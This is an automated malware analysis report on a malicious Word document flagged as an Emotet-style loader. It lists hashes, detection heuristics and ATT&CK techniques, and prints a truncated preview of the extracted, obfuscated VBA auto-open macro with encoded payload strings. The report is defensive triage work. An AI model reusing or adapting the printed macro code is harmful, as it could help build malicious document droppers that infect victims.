Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 af9bdad4cfd538b6…

MALICIOUS

Office (OLE)

212.0 KB Created: 2018-03-21 14:35:00 Authoring application: Microsoft Office Word First seen: 2018-04-12
MD5: c58026be64edad4f40ced2414c9586b3 SHA-1: 3c4ffcc7de76fc2bca42ee076535c501c72a6965 SHA-256: af9bdad4cfd538b6bf23617db51e6499b21eda57aff97e739fba65f3da63631f
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing significant VBA macros, including an AutoOpen macro that uses CreateObject, indicating an attempt to execute code. The presence of legacy WordBasic and Excel 4.0 macros further supports malicious intent. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' and the extracted 'macros.bas' file are key indicators of a downloader or droppper malware.

Heuristics 9

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 78796 bytes
SHA-256: 8f2257a2ef6c306e9ce6a626346feef934a6d918ddb9400132f74a1da3952a7d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 20 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wJFcflwuwq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "hHCAEKhwrlztl"
Function KNWwcadFS()
On Error Resume Next
Select Case auwMRz
         Case 43511
            PIaqv = JSvWoq
            sowtz = zMoGVm
            RBtiwB = Cos(32394 * CBool(64234))
         Case 47159
            VajSGn = 93073
            ntchFz = Fix(35693)
            RZobB = Oct(8530)
End Select
SbwraKEhFJD = JdXATb("laAUGAzAgMAMGA3AAOAADAmBQYAUGA3AgNAADA0AQYAMDAzAgNAQGAzAAOAUGA2AAMAQDA4AANAgDA3AgMAQDAjBwYAMDAkBAZAYGAlBgMAMGAkBQZAcDA5AwYAgDA3AAOAYDAlBAZAQGAhBQYAIGA3AgZAcDAiBQOAEGA1AgMAUGAlBgMAEDA5AAZAIDA5Aw4Fwd", 5 + 0, 191 + 0)
Select Case CRIYM
         Case 50231
            ZXUCcT = NqZrj
            tPjvuQ = jrswkR
            iBzPj = Cos(638 * CBool(1412))
         Case 37789
            NDWzD = 7962
            PjVWKm = Fix(63813)
            iwzDi = Oct(59538)
End Select
Select Case cPJPc
         Case 13456
            ZMYjju = VwhjF
            EwriN = RPjEiY
            KHfjsw = Cos(28229 * CBool(97714))
         Case 19666
            LAbRvn = 79511
            rjMBfX = Fix(59270)
            hpOpH = Oct(88622)
End Select
dwtqdzIj = JdXATb("7ufQOAUGAiBAZAYDA4AwNAADA1AAOAMGAmBAOAEGA5AAZAEGAmBQZAEDAhBwMAQDAlBgZAIDAyAwNAgDA2AwNAADAiBAOAEGAwAQYAYGAiBwYAgDAmBQOAYDAxAQNAIGAiBQYAkDAmBwMAgDA1AQYAgDAyAwYAYGA2AQNAYDAzAQ7bt2", 5 + 0, 169 + 0)
Select Case BkMpO
         Case 77745
            qNuVfi = iWbuSn
            SIbIEq = ZkUTR
            Zhiwaw = Cos(15002 * CBool(79450))
         Case 96415
            KrAPC = 37260
            vpGQib = Fix(71280)
            KzTRda = Oct(3124)
End Select
Select Case YGZozH
         Case 67615
            cfdAK = jLnjla
            jPqwX = kiNGN
            QwBmsD = Cos(31936 * CBool(38658))
         Case 92952
            KMMtoK = 38364
            nVMkr = Fix(82011)
            raEwfP = Oct(49013)
End Select
OkZvOrnLS = JdXATb("7tjpkPADAmBgZm", 2 + 0, 7 + 0)
Select Case WtffY
         Case 91447
            UGInEi = dOZOAS
            SfGKDA = MVRdlz
            zJfvRK = Cos(2530 * CBool(11008))
         Case 55486
            lFHwq = 49230
            OGXEO = Fix(48625)
            VvzIl = Oct(82340)
End Select
Select Case kfsua
         Case 24084
            DTsHi = BcQFbQ
            DRCjzu = qwXFA
            lJJPN = Cos(33288 * CBool(16323))
         Case 42927
            tEqNUE = 57019
            ZmVUA = Fix(35561)
            IufvXH = Oct(92867)
End Select
tjTbWacG = JdXATb("bFNCDAzAQZAEGAzAQYAEGA1AwYAcDAxAAZAMGA3AgNAEDAhBgMAADA3AwYAEGA4AAMAYGAkBgMAEGA2AAOAMGAjBAZAUDAhBQZAkDAlBQNAIDAjBgMAkDAkBgZAYGA0AwNAMGAjBgMAMDAlBwYAADA2AQOAQDAxAQYAMDA0AQfb%", 4 + 0, 165 + 0)
Select Case GFLrTB
         Case 85308
            HZOXw = maMMnw
            fFkrj = SlMwi
            RjHINK = Cos(15639 * CBool(63272))
         Case 55303
            umuiO = 14903
            jLTwU = Fix(50958)
            bAmuZY = Oct(89813)
End Select
Select Case issiZS
         Case 36298
            SDIoK = MBhptL
            GDwfX = sIzob
            QjzYIr = Cos(16253 * CBool(34176))
         Case 97417
            jdpGQ = 48567
            IAiujc = Fix(78375)
            wCuatT = Oct(29542)
End Select
BPNBd = JdXATb("Jo hGA2AwMAcDA0AwMAUDAiBwNAMDA0AAOAIDA3AQZAY7wIhnfG", 3 + 0, 40 + 0)
Select Case LuNMcY
         Case 96763
            uGCWVq = GTJqn
            jjDKiK = NrFjRw
            MDMVkB = Cos(93821 * CBool(99922))
         Case 50297
            RYIlo = 13927
            dbncKJ = Fix(3252)
            OIXCBS = Oct(10727)
End Select
Select Case biASJB
         Case 29945
            fKnai = uwikfc
            dowSG = HblEj
            jCiPz = Cos(3689 * CBool(1331))
         Case 87147
            mYFzHq = 55242
            YWqLiw = Fix(87683)
            
... (truncated)